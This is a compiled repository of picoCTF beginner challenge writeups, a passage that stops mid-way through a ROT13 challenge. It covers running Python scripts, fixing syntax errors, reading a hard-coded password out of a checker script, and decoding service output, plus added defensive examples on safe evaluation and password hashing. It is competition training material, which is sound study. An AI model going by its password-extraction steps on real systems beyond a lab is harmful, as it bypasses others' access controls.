├── Beginner_picoMini_2022 ├── General_Skills │ ├── Codebook.md │ ├── Glitch_Cat.md │ ├── HashingJobApp.md │ ├── PW_Crack_1.md │ ├── PW_Crack_2.md │ ├── PW_Crack_3.md │ ├── PW_Crack_4.md │ ├── PW_Crack_5.md │ ├── README.md │ ├── Serpentine.md │ ├── convertme.py.md │ ├── fixme1.py.md │ ├── fixme2.py.md │ └── runme.py.md └── README.md ├── README.md ├── picoCTF_2019 ├── Binary_Exploitation │ ├── README.md │ └── seed-sPRiNG.md ├── Cryptography │ ├── 13.md │ ├── Easy1.md │ ├── Flags.md │ ├── Mr-Worldwide.md │ ├── README.md │ ├── Tapping.md │ ├── The_Numbers.md │ ├── caesar.md │ ├── la_cifra_de.md │ ├── miniRSA.md │ ├── rsa-pop-quiz.md │ └── waves_over_lambda.md ├── Forensics │ ├── Glory_of_the_Garden.md │ ├── Investigative_Reversing_0.md │ ├── Investigative_Reversing_1.md │ ├── README.md │ ├── So_Meta.md │ ├── What_Lies_Within.md │ ├── WhitePages.md │ ├── extensions.md │ ├── like1000.md │ ├── m00nwalk.md │ ├── m00nwalk2.md │ ├── shark_on_wire_1.md │ └── shark_on_wire_2.md ├── General_Skills │ ├── 1_wanna_b3_a_r0ck5tar.md │ ├── 2Warm.md │ ├── Based.md │ ├── Bases.md │ ├── First_Grep.md │ ├── Lets_Warm_Up.md │ ├── README.md │ ├── Warmed_Up.md │ ├── flag_shop.md │ ├── mus1c.md │ ├── plumbing.md │ ├── strings_it.md │ └── whats_a_net_cat.md ├── README.md ├── Reverse_Engineering │ ├── Droids0_Emulation.png │ ├── README.md │ ├── asm1.md │ ├── asm2.md │ ├── asm3.md │ ├── droids0.md │ ├── droids1.md │ ├── reverse_cipher.md │ ├── vault-door-1.md │ ├── vault-door-3.md │ ├── vault-door-4.md │ ├── vault-door-5.md │ ├── vault-door-6.md │ └── vault-door-training.md └── Web_Exploitation │ ├── Client-side-again.md │ ├── Insp3ct0r.md │ ├── Irish-Name-Repo_1.md │ ├── Irish-Name-Repo_2.md │ ├── Network_conditions_tab_in_DevTools.png │ ├── README.md │ ├── dont-use-client-side.md │ ├── logon.md │ ├── picobrowser.md │ └── where_are_the_robots.md ├── picoCTF_2020 ├── Forensics │ └── Pitter_Patter_Platters.md ├── README.md └── Web_Exploitation │ └── Web_Gauntlet.md ├── picoCTF_2021 ├── 
Binary_Exploitation │ ├── Heres_a_LIBC.md │ ├── README.md │ └── Stonks.md ├── Cryptography │ ├── Dachshund_Attacks.md │ ├── Easy_Peasy.md │ ├── Mind_your_Ps_and_Qs.md │ ├── Mini_RSA.md │ ├── Mod_26.md │ ├── New_Caesar.md │ ├── No_Padding_No_Problem.md │ ├── Pixelated.md │ ├── Play_Nice.md │ └── README.md ├── Forensics │ ├── Booting_disk_in_Qemu.png │ ├── Disk_disk_sleuth.md │ ├── Disk_disk_sleuth_II.md │ ├── MacroHard_WeakEdge.md │ ├── Matryoshka_doll.md │ ├── Milkslap.md │ ├── README.md │ ├── Surfing_the_Waves.md │ ├── Trivial_Flag_Transfer_Protocol.md │ ├── Wireshark_doo_dooo_do_doo.md │ ├── Wireshark_twoo_twooo_two_twoo.md │ ├── information.md │ └── tunn3l_v1s10n.md ├── General_Skills │ ├── Magikarp_Ground_Mission.md │ ├── Nice_netcat.md │ ├── Obedient_Cat.md │ ├── Python_Wrangling.md │ ├── README.md │ ├── Static_aint_always_noise.md │ ├── Tab_Tab_Attack.md │ └── Wave_a_flag.md ├── README.md ├── Reverse_Engineering │ ├── ARMssembly_0.md │ ├── ARMssembly_1.md │ ├── ARMssembly_2.md │ ├── ARMssembly_3.md │ ├── ARMssembly_4.md │ ├── README.md │ ├── Shop.md │ ├── The_flag_in_NC_Viewer.png │ ├── Transformation.md │ ├── crackme-py.md │ ├── keygenme-py.md │ └── speeds_and_feeds.md └── Web_Exploitation │ ├── Cookies.md │ ├── GET_aHEAD.md │ ├── It_is_my_Birthday.md │ ├── More_Cookies.md │ ├── Most_Cookies.md │ ├── README.md │ ├── Scavenger_Hunt.md │ ├── Some_Assembly_Required_1.md │ ├── Some_Assembly_Required_2.md │ └── Who_are_you.md ├── picoCTF_2022 ├── Binary_Exploitation │ ├── CVE-XXXX-XXXX.md │ ├── README.md │ ├── RPS.md │ ├── basic-file-exploit.md │ ├── buffer_overflow_0.md │ ├── buffer_overflow_1.md │ └── buffer_overflow_2.md ├── Cryptography │ ├── README.md │ ├── Vigenere.md │ ├── basic-mod1.md │ ├── basic-mod2.md │ ├── credstuff.md │ ├── morse-code.md │ ├── rail-fence.md │ ├── substitution0.md │ ├── substitution1.md │ ├── substitution2.md │ └── transposition-trial.md ├── Forensics │ ├── Disk_mounted_in_FTK_Imager.png │ ├── Enhance.md │ ├── File_types.md │ ├── 
Lookey_here.md │ ├── Packets_Primer.md │ ├── README.md │ ├── Redaction_gone_wrong.md │ ├── Sleuthkit_Apprentice.md │ └── Sleuthkit_Intro.md ├── README.md ├── Reverse_Engineering │ ├── Fresh_Java.md │ ├── GDB_Layout_Asm.png │ ├── GDB_Test_Drive.md │ ├── README.md │ ├── Safe_Opener.md │ ├── bloat.py.md │ ├── file-run1.md │ ├── file-run2.md │ ├── jadx-gui_decompilation.png │ ├── patchme.py.md │ └── unpackme.py.md └── Web_Exploitation │ ├── Forbidden_Paths.md │ ├── Includes.md │ ├── Inspect_HTML.md │ ├── Local_Authority.md │ ├── Power_Cookie.md │ ├── README.md │ ├── Roboto_Sans.md │ ├── Search_source.md │ └── Secrets.md ├── picoCTF_2023 ├── Binary_Exploitation │ ├── README.md │ ├── Twos_complement.png │ ├── VNE.md │ ├── babygame01.md │ ├── hijacking.md │ ├── tic-tac.md │ └── two-sum.md ├── Cryptography │ ├── HideToSee.md │ ├── README.md │ ├── ReadMyCert.md │ └── rotation.md ├── Forensics │ ├── FindAndOpen.md │ ├── Invisible_WORDs.md │ ├── MSB.md │ ├── PcapPoisoning.md │ ├── README.md │ ├── StegSolve_MSB_data_extraction.png │ └── hideme.md ├── General_Skills │ ├── Permissions.md │ ├── README.md │ ├── Special.md │ ├── Specialer.md │ ├── chrono.md │ ├── repetitions.md │ └── useless.md ├── README.md ├── Reverse_Engineering │ ├── README.md │ ├── Ready_Gladiator_0.md │ ├── Ready_Gladiator_1.md │ ├── Ready_Gladiator_2.md │ ├── Reverse.md │ ├── Safe_Opener_2.md │ ├── The_Black_Box_in_Blender.png │ ├── Virtual_Machine_0.md │ └── timer.md └── Web_Exploitation │ ├── MatchTheRegex.md │ ├── More_SQLi.md │ ├── More_SQLi_in_Burp_Suite.png │ ├── README.md │ ├── Redirections_in_the_findme_challenge.png │ ├── SOAP.md │ └── findme.md ├── picoCTF_2024 ├── Binary_Exploitation │ ├── README.md │ ├── format_string_0.md │ ├── format_string_1.md │ ├── format_string_2.md │ ├── heap_0.md │ ├── heap_1.md │ └── heap_2.md ├── Cryptography │ ├── C3.md │ ├── Custom_encryption.md │ ├── README.md │ └── interencdec.md ├── Forensics │ ├── Blast_from_the_past.md │ ├── CanYouSee.md │ ├── Mob_psycho.md │ ├── 
README.md │ ├── Scan_Surprise.md │ ├── Secret_of_the_Polyglot.md │ └── Verify.md ├── General_Skills │ ├── Binary_Search.md │ ├── Blame_Game.md │ ├── Collaborative_Development.md │ ├── Commitment_Issues.md │ ├── README.md │ ├── SansAlpha.md │ ├── Super_SSH.md │ ├── Time_Machine.md │ ├── binhexa.md │ ├── dont-you-love-banners.md │ └── endianness.md ├── README.md ├── Reverse_Engineering │ ├── FactCheck.md │ ├── README.md │ └── packer.md └── Web_Exploitation │ ├── Bookmarklet.md │ ├── Images │ └── Bookmarklet_Web_Site.png │ ├── IntroToBurp.md │ ├── README.md │ ├── Trickster.md │ ├── Unminify.md │ └── WebDecode.md ├── picoCTF_2025 ├── Binary_Exploitation │ ├── PIE_TIME.md │ └── README.md ├── Cryptography │ ├── EVEN_RSA_CAN_BE_BROKEN.md │ ├── README.md │ └── hashcrack.md ├── Forensics │ ├── Images │ │ └── Info_encoded_in_RED.png │ ├── Ph4nt0m_1ntrud3r.md │ ├── README.md │ └── RED.md ├── General_Skills │ ├── FANTASY_CTF.md │ ├── README.md │ ├── Rust_fixme_1.md │ ├── Rust_fixme_2.md │ └── Rust_fixme_3.md ├── README.md ├── Reverse_Engineering │ ├── Flag_Hunters.md │ └── README.md └── Web_Exploitation │ ├── Cookie_Monster_Secret_Recipe.md │ ├── Images │ ├── Cookie_Monster.png │ ├── Heapdump_endpoint_info.png │ ├── NoSanity_1.png │ ├── Pachinko_NAND_Simulator.png │ ├── SSTI_Decision_Tree.png │ └── head-dump.png │ ├── Pachinko.md │ ├── README.md │ ├── SSTI1.md │ ├── head-dump.md │ └── n0s4n1ty_1.md ├── picoGym_Exclusive ├── Binary_Exploitation │ ├── Local_Target.md │ └── README.md ├── Forensics │ ├── Name_of_SSID_Field_in_Wireshark.png │ ├── README.md │ └── WPA-ing_Out.md ├── General_Skills │ ├── ASCII_Numbers.md │ ├── Big_Zip.md │ ├── First_Find.md │ └── README.md ├── README.md ├── Reverse_Engineering │ ├── ASCII_FTW.md │ ├── Bit-O-Asm-1.md │ ├── Bit-O-Asm-2.md │ ├── Bit-O-Asm-3.md │ ├── Bit-O-Asm-4.md │ ├── GDB_baby_step_1.md │ ├── GDB_baby_step_2.md │ ├── GDB_baby_step_3.md │ ├── GDB_baby_step_4.md │ ├── Picker_I.md │ ├── Picker_II.md │ ├── Picker_III.md │ ├── Picker_IV.md 
│ └── README.md └── Web_Exploitation │ ├── JAuth.md │ ├── README.md │ └── The_Token_Cookie_in_DevTools.png ├── picoMini_by_redpwn ├── Binary_Exploitation │ ├── README.md │ └── clutter-overflow.md ├── Cryptography │ ├── README.md │ ├── XtraORdinary.md │ ├── spelling-quiz.md │ └── triple-secure.md ├── Forensics │ ├── README.md │ └── advanced-potion-making.md ├── README.md ├── Reverse_Engineering │ ├── README.md │ └── not_crypto.md └── Web_Exploitation │ ├── README.md │ ├── caas.md │ └── login.md └── picoctf_logo.png

---

`/Beginner_picoMini_2022/General_Skills/Codebook.md`:

# Codebook

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: Beginner picoMini 2022, General Skills, shell, Python
Author: LT 'SYREAL' JONES

Description:
Run the Python script code.py in the same directory as codebook.txt.

Download code.py
Download codebook.txt

Hints:
1. On the webshell, use ls to see if both files are in the directory you are in
2. The str_xor function does not need to be reverse engineered for this challenge.
```
Challenge link: [https://play.picoctf.org/practice/challenge/238](https://play.picoctf.org/practice/challenge/238)

## Solution

Most of the time you just make sure the script is executable and then run it
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Codebook]
└─$ chmod +x code.py

┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Codebook]
└─$ ./code.py
./code.py: 2: import: not found
./code.py: 3: import: not found
./code.py: 7: Syntax error: "(" unexpected
```

But in this case that doesn't work.
The reason for this is that the script doesn't contain a so-called 'shebang': a special comment on the first line specifying which program/interpreter should execute the script. It normally looks something like this: `#!/usr/bin/python3`. Without it, the shell falls back to running the file as a shell script, which is why `import` is reported as a command that was not found.

Let's display the first lines of the script with `head` to verify this.
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Codebook]
└─$ head code.py

import random
import sys

def str_xor(secret, key):
    #extend key to secret length
    new_key = key
    i = 0
```

Yes, the shebang is missing, so we need to say explicitly that Python should run the script, like this
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Codebook]
└─$ python code.py
picoCTF{}
```

For additional information, please see the references below.

### References

- [Real Python - Executing Python Scripts With a Shebang](https://realpython.com/python-shebang/)
- [chmod — Linux manual page](https://man7.org/linux/man-pages/man1/chmod.1.html)
- [head — Linux manual page](https://man7.org/linux/man-pages/man1/head.1.html)

---

`/Beginner_picoMini_2022/General_Skills/Glitch_Cat.md`:

# Glitch Cat

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: Beginner picoMini 2022, General Skills, nc, shell, Python
Author: LT 'SYREAL' JONES

Description:
Our flag printing service has started glitching!

$ nc saturn.picoctf.net 50363

Hints:
1. ASCII is one of the most common encodings used in programming
2. We know that the glitch output is valid Python, somehow!
3. Press Ctrl and c on your keyboard to close your connection and return to the command prompt.
```
Challenge link: [https://play.picoctf.org/practice/challenge/242](https://play.picoctf.org/practice/challenge/242)

## Solution

Connect to the flag printing service
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Glitch_Cat]
└─$ nc saturn.picoctf.net 50363
'picoCTF{gl17ch_m3_n07_' + chr(0x61) + chr(0x34) + chr(0x33) + chr(0x39) + chr(0x32) + chr(0x64) + chr(0x32) + chr(0x65) + '}'
```

The first part of the flag looks correct, but the last part looks rather like Python code.

Let's try to execute it
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Glitch_Cat]
└─$ python -c "print('picoCTF{gl17ch_m3_n07_' + chr(0x61) + chr(0x34) + chr(0x33) + chr(0x39) + chr(0x32) + chr(0x64) + chr(0x32) + chr(0x65) + '}')"
picoCTF{}
```
And we get the complete flag (but redacted here).

The plus operator can also "add" strings together; this is called concatenation.
The `chr` function returns the character whose ASCII (code point) value is the given number.
Numbers prefixed with `0x` are written in hexadecimal.

For additional information, please see the references below.
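Running `python -c` on whatever the service sends executes that text as Python, which is fine for a CTF service you trust but a poor habit with unknown input. The following added example (mine, not part of the original writeup) walks the expression's syntax tree with the `ast` module and accepts only string literals, `chr(<integer>)` calls and `+` concatenation; anything else, such as a call that imports a module, is rejected instead of run. `SAMPLE_OUTPUT` is a constructed string in the same shape as the glitched output, not the real challenge output.

```python
import ast
import sys

# Constructed sample in the same shape as the glitched service output
# (not the real challenge output; the flag characters here are made up).
SAMPLE_OUTPUT = "'picoCTF{s4mpl3_' + chr(0x61) + chr(0x62) + chr(0x63) + '}'"


def eval_str_concat(expr: str) -> str:
    """Evaluate an expression made only of string literals, chr(<int>) calls
    and '+' concatenation, without handing the text to exec/eval.

    Any other construct raises ValueError (or SyntaxError if it does not
    parse at all), so nothing outside that grammar ever executes.
    """
    tree = ast.parse(expr.strip(), mode="eval")

    def walk(node: ast.AST) -> str:
        # A string literal such as 'picoCTF{...'
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            return node.value
        # chr(0x61): the builtin name 'chr' with exactly one integer literal
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Name)
                and node.func.id == "chr"
                and len(node.args) == 1
                and not node.keywords
                and isinstance(node.args[0], ast.Constant)
                and isinstance(node.args[0].value, int)
                and not isinstance(node.args[0].value, bool)):
            code = node.args[0].value
            if not 0 <= code <= 0x10FFFF:
                raise ValueError(f"chr() argument out of range: {code}")
            return chr(code)
        # left + right: recurse into both operands
        if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
            return walk(node.left) + walk(node.right)
        raise ValueError(f"refusing to evaluate: {ast.dump(node)}")

    return walk(tree.body)


def is_safe_concat(expr: str) -> bool:
    """True if eval_str_concat accepts the expression, False otherwise."""
    try:
        eval_str_concat(expr)
        return True
    except (ValueError, SyntaxError):
        return False


if __name__ == "__main__":
    # Read the service output from a pipe if there is one, else use the sample
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_OUTPUT
    print(eval_str_concat(data))
```

Piping the `nc` output into this script (`nc host port | python3 glitch_eval.py`) gives the same result as the `python -c` one-liner for the expression shape shown above, while an unexpected payload in the stream produces a `ValueError` rather than running.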

### References

- [W3Schools - Python Operators](https://www.w3schools.com/python/python_operators.asp)
- [nc - Linux man page](https://linux.die.net/man/1/nc)
- [Wikipedia - ASCII](https://en.wikipedia.org/wiki/ASCII)
- [Wikipedia - Hexadecimal](https://en.wikipedia.org/wiki/Hexadecimal)

---

`/Beginner_picoMini_2022/General_Skills/PW_Crack_1.md`:

# PW Crack 1

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: Beginner picoMini 2022, General Skills, password_cracking
Author: LT 'SYREAL' JONES

Description:
Can you crack the password to get the flag?

Download the password checker here and you'll need the encrypted flag in the same directory too.

Hints:
1. To view the file in the webshell, do: $ nano level1.py
2. To exit nano, press Ctrl and x and follow the on-screen prompts.
3. The str_xor function does not need to be reverse engineered for this challenge.
```
Challenge link: [https://play.picoctf.org/practice/challenge/245](https://play.picoctf.org/practice/challenge/245)

## Solution

Let's start with analysing the Python script.
The script looks like this (with some empty lines removed)
```python
### THIS FUNCTION WILL NOT HELP YOU FIND THE FLAG --LT ########################
def str_xor(secret, key):
    #extend key to secret length
    new_key = key
    i = 0
    while len(new_key) < len(secret):
        new_key = new_key + key[i]
        i = (i + 1) % len(key)
    return "".join([chr(ord(secret_c) ^ ord(new_key_c)) for (secret_c,new_key_c) in zip(secret,new_key)])
###############################################################################

flag_enc = open('level1.flag.txt.enc', 'rb').read()

def level_1_pw_check():
    user_pw = input("Please enter correct password for flag: ")
    if( user_pw == "691d"):
        print("Welcome back... your flag, user:")
        decryption = str_xor(flag_enc.decode(), user_pw)
        print(decryption)
        return
    print("That password is incorrect")

level_1_pw_check()
```

The most interesting part is of course the `if` statement, where we see the password in plain text
```python
<---snip--->
    user_pw = input("Please enter correct password for flag: ")
    if( user_pw == "691d"):
        print("Welcome back... your flag, user:")
        decryption = str_xor(flag_enc.decode(), user_pw)
        print(decryption)
        return
<---snip--->
```

With knowledge of the password (`691d`) we can run the script to get the flag
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/PW_Crack_1]
└─$ python level1.py
Please enter correct password for flag: 691d
Welcome back... your flag, user:
picoCTF{}
```

For additional information, please see the references below.
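The weakness this challenge demonstrates is the password compared as a string literal in the source. The added example below (mine, not the writeup's or the challenge's own code) re-implements `str_xor` with the same behaviour, shows the clear-text check beside a hardened variant that stores only a salted PBKDF2 hash and compares it in constant time, and then gates the XOR decryption on that check. `PBKDF2_ROUNDS`, the sample flag and the fixed salt are assumed or constructed values; the password literal `691d` is the one from the challenge script.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple


def str_xor(secret: str, key: str) -> str:
    """Repeating-key XOR, behaviourally the same as str_xor in level1.py.

    XOR is its own inverse: one call encrypts, a second call with the same
    key decrypts.
    """
    if not key:
        raise ValueError("key must not be empty")
    # Extend the key by repetition until it covers the whole secret
    new_key = (key * (len(secret) // len(key) + 1))[:len(secret)]
    return "".join(chr(ord(s) ^ ord(k)) for s, k in zip(secret, new_key))


# --- What the challenge script does: the password sits in the source --------
LEVEL_1_PASSWORD = "691d"   # literal copied from the challenge's if statement


def level_1_pw_check_insecure(user_pw: str) -> bool:
    """Clear-text comparison: anyone who can read the file knows the password."""
    return user_pw == LEVEL_1_PASSWORD


# --- Hardened form: keep only a salted PBKDF2 hash, compare in constant time -
PBKDF2_ROUNDS = 200_000   # assumed work factor chosen for this example


def make_password_record(password: str,
                         salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, derived_key); this pair is what gets stored, not the password."""
    salt = salt if salt is not None else os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, derived


def check_password_hashed(user_pw: str, salt: bytes, stored_key: bytes) -> bool:
    """Re-derive from the candidate and compare without an early-exit byte loop."""
    candidate = hashlib.pbkdf2_hmac("sha256", user_pw.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, stored_key)


def decrypt_flag_if_authorized(flag_enc: str, user_pw: str,
                               salt: bytes, stored_key: bytes) -> Optional[str]:
    """Gate the XOR decryption on the hashed check rather than a literal compare."""
    if not check_password_hashed(user_pw, salt, stored_key):
        return None
    return str_xor(flag_enc, user_pw)


if __name__ == "__main__":
    sample_flag = "picoCTF{s4mpl3_fl4g}"          # constructed, not a real flag
    enc = str_xor(sample_flag, LEVEL_1_PASSWORD)  # what level1.flag.txt.enc would hold
    salt, key = make_password_record(LEVEL_1_PASSWORD)
    print(decrypt_flag_if_authorized(enc, LEVEL_1_PASSWORD, salt, key))  # the flag
    print(decrypt_flag_if_authorized(enc, "wrong", salt, key))           # None
```

Storing the hash removes the plain-text leak from the source file, but it does not change that the XOR key is still the password itself and that a four-character password is short: the hash only raises the cost of each guess, so password length still matters.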

### References

- [Wikipedia - Exclusive or](https://en.wikipedia.org/wiki/Exclusive_or)
- [W3Schools - Python - List Comprehension](https://www.w3schools.com/python/python_lists_comprehension.asp)
- [GeeksforGeeks - zip() in Python](https://www.geeksforgeeks.org/zip-in-python/)

---

`/Beginner_picoMini_2022/General_Skills/README.md`:

# General Skills Challenges

13 Challenges:
- [Codebook](Codebook.md)
- [convertme.py](convertme.py.md)
- [fixme1.py](fixme1.py.md)
- [fixme2.py](fixme2.py.md)
- [Glitch Cat](Glitch_Cat.md)
- [HashingJobApp](HashingJobApp.md)
- [PW Crack 1](PW_Crack_1.md)
- [PW Crack 2](PW_Crack_2.md)
- [PW Crack 3](PW_Crack_3.md)
- [PW Crack 4](PW_Crack_4.md)
- [PW Crack 5](PW_Crack_5.md)
- [runme.py](runme.py.md)
- [Serpentine](Serpentine.md)

---

`/Beginner_picoMini_2022/General_Skills/fixme1.py.md`:

# fixme1.py

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: Beginner picoMini 2022, General Skills, Python
Author: LT 'SYREAL' JONES

Description:
Fix the syntax error in this Python script to print the flag.

Download Python script

Hints:
1. Indentation is very meaningful in Python
2. To view the file in the webshell, do: $ nano fixme1.py
3. To exit nano, press Ctrl and x and follow the on-screen prompts.
4. The str_xor function does not need to be reverse engineered for this challenge.
```
Challenge link: [https://play.picoctf.org/practice/challenge/240](https://play.picoctf.org/practice/challenge/240)

## Solution

Try running the script and see what happens
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Fixme1.py]
└─$ python fixme1.py
  File "/mnt/hgfs/CTFs/picoCTF/Beginner_picoMini_2022/General_Skills/Fixme1.py/fixme1.py", line 20
    print('That is correct! Here\'s your flag: ' + flag)
IndentationError: unexpected indent
```

Python uses [indentation](https://www.w3schools.com/python/gloss_python_indentation.asp) to indicate which lines of code belong to a block of code.
The indentation consists of spaces or tabs. You can choose either, but you cannot mix them in the same script.

Let's look at the lines of code around line 20
```python
<---snip--->
flag_enc = chr(0x15) + chr(0x07) + chr(0x08) + chr(0x06) + chr(0x27) + chr(0x21) + chr(0x23) + chr(0x15) + chr(0x5a) + chr(0x07) + chr(0x00) + chr(0x46) + chr(0x0b) + chr(0x1a) + chr(0x5a) + chr(0x1d) + chr(0x1d) + chr(0x2a) + chr(0x06) + chr(0x1c) + chr(0x5a) + chr(0x5c) + chr(0x55) + chr(0x40) + chr(0x3a) + chr(0x5e) + chr(0x52) + chr(0x0c) + chr(0x01) + chr(0x42) + chr(0x57) + chr(0x59) + chr(0x0a) + chr(0x14)

flag = str_xor(flag_enc, 'enkidu')
  print('That is correct! Here\'s your flag: ' + flag)
```

The `print` statement is indented but shouldn't be. Remove the spaces before `print` and save the script.

Then try to run the script again
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Fixme1.py]
└─$ python fixme1.py
That is correct! Here's your flag: picoCTF{}
```

For additional information, please see the references below.

### References

- [W3Schools - Python Indentation](https://www.w3schools.com/python/gloss_python_indentation.asp)

---

`/Beginner_picoMini_2022/General_Skills/fixme2.py.md`:

# fixme2.py

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: Beginner picoMini 2022, General Skills, Python
Author: LT 'SYREAL' JONES

Description:
Fix the syntax error in the Python script to print the flag.

Download Python script

Hints:
1. Are equality and assignment the same symbol?
2. To view the file in the webshell, do: $ nano fixme2.py
3. To exit nano, press Ctrl and x and follow the on-screen prompts.
4. The str_xor function does not need to be reverse engineered for this challenge.
```
Challenge link: [https://play.picoctf.org/practice/challenge/241](https://play.picoctf.org/practice/challenge/241)

## Solution

Try running the script and see what happens
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Fixme2.py]
└─$ python fixme2.py
  File "/mnt/hgfs/CTFs/picoCTF/Beginner_picoMini_2022/General_Skills/Fixme2.py/fixme2.py", line 22
    if flag = "":
       ^^^^^^^^^
SyntaxError: invalid syntax. Maybe you meant '==' or ':=' instead of '='?
```

Python is kind enough to suggest possible solutions. Change the `=` to `==` and save the script.
`=` is the assignment operator and `==` is the equality comparison operator.

Then try to run the script again
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Fixme2.py]
└─$ python fixme2.py
That is correct! Here's your flag: picoCTF{}
```

For additional information, please see the references below.

### References

- [W3Schools - Python Operators](https://www.w3schools.com/python/python_operators.asp)

---

`/Beginner_picoMini_2022/General_Skills/runme.py.md`:

# runme.py

- [Challenge information](#challenge-information)
- [Solution](#solution)

## Challenge information
```
Points: 100
Tags: Beginner picoMini 2022, General Skills, Python
Author: SUJEET KUMAR

Description:
Run the runme.py script to get the flag.
Download the script with your browser or with wget in the webshell.
Download runme.py Python script

Hints:
1. If you have Python on your computer, you can download the script normally and run it.
Otherwise, use the wget command in the webshell.
2. To use wget in the webshell, first right click on the download link and select 'Copy Link' or 'Copy Link Address'
3. Type everything after the dollar sign in the webshell:
$ wget , then paste the link after the space after wget and press enter.
This will download the script for you in the webshell so you can run it!
4. Finally, to run the script, type everything after the dollar sign and then press enter:
$ python3 runme.py You should have the flag now!
```
Challenge link: [https://play.picoctf.org/practice/challenge/250](https://play.picoctf.org/practice/challenge/250)

## Solution

This challenge is very straightforward, but let's start by looking at the script
```python
#!/usr/bin/python3
################################################################################
# Python script which just prints the flag
################################################################################

flag ='picoCTF{}'
print(flag)
```

And there is our flag (but it's redacted above).

If we still want to run the script we can certainly do that. Either explicitly with Python
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Runme.py]
└─$ python runme.py
picoCTF{}
```

Or by making sure it is executable and then running it stand-alone (this works here because the script has a shebang line)
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Runme.py]
└─$ chmod +x runme.py

┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Runme.py]
└─$ ./runme.py
picoCTF{}
```

---

`/Beginner_picoMini_2022/README.md`:

# Beginner picoMini 2022 Challenges

## General Skills Challenges

13 Challenges:
- [Codebook](General_Skills/Codebook.md)
- [convertme.py](General_Skills/convertme.py.md)
- [fixme1.py](General_Skills/fixme1.py.md)
- [fixme2.py](General_Skills/fixme2.py.md)
- [Glitch Cat](General_Skills/Glitch_Cat.md)
- [HashingJobApp](General_Skills/HashingJobApp.md)
- [PW Crack 1](General_Skills/PW_Crack_1.md)
- [PW Crack 2](General_Skills/PW_Crack_2.md)
- [PW Crack 3](General_Skills/PW_Crack_3.md)
- [PW Crack 4](General_Skills/PW_Crack_4.md)
- [PW Crack 5](General_Skills/PW_Crack_5.md)
- [runme.py](General_Skills/runme.py.md)
- [Serpentine](General_Skills/Serpentine.md)

---

`/README.md`:

![picoCTF Logo](picoctf_logo.png)

# Writeups for picoCTF challenges

Welcome to [my](https://play.picoctf.org/users/Cajac) writeups for [picoCTF](https://play.picoctf.org/login) challenges.
These writeups are mainly documentation for myself, but I hope others will benefit from them as well.

In total you will find more than 250 challenge solutions here.

## Challenges

- [picoCTF 2025 Challenges](picoCTF_2025/README.md)
- [picoCTF 2024 Challenges](picoCTF_2024/README.md)
- [picoCTF 2023 Challenges](picoCTF_2023/README.md)
- [picoCTF 2022 Challenges](picoCTF_2022/README.md)
- [Beginner picoMini 2022 Challenges](Beginner_picoMini_2022/README.md)
- [picoMini by redpwn Challenges](picoMini_by_redpwn/README.md)
- [picoCTF 2021 Challenges](picoCTF_2021/README.md)
- [picoCTF 2020 Mini-Competition Challenges](picoCTF_2020/README.md)
- [picoCTF 2019 Challenges](picoCTF_2019/README.md)
- [picoGym Exclusive Challenges](picoGym_Exclusive/README.md)

## No spoilers

The solutions contain step-by-step walkthroughs but don't display the flags in plain text.
Instead the flags are displayed as `picoCTF{}` or with just some portion of the flag visible.

## Support my work

If you appreciate this repository and learn from it, please consider [giving it a star](https://docs.github.com/en/get-started/exploring-projects-on-github/saving-repositories-with-stars#starring-a-repository) to support it and spread the word.

## Language disclaimer

I'm not a native English speaker, so please forgive any spelling mistakes or grammatical errors.

## Acknowledgements

Some of the solutions were inspired by writeups and walkthroughs from these guys:

- [Almond Force](https://www.youtube.com/@AlmondForce)
- [David](https://github.com/Dvd848/CTFs)
- [Gynvael](https://www.youtube.com/@GynvaelEN)
- [Hayden Housen](https://github.com/HHousen)
- [John Hammond](https://www.youtube.com/@_JohnHammond)
- [Martin Carlisle](https://www.youtube.com/@carlislemc)

---

`/picoCTF_2019/Binary_Exploitation/README.md`:

# Binary Exploitation Challenges

1 Challenge:
- [seed-sPRiNG](seed-sPRiNG.md)

---

`/picoCTF_2019/Cryptography/13.md`:

# 13

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoCTF 2019, Cryptography
Author: ALEX FULTON/DANIEL TUNITIS

Description:
Cryptography can be easy, do you know what ROT13 is?
cvpbPGS{abg_gbb_onq_bs_n_ceboyrz}

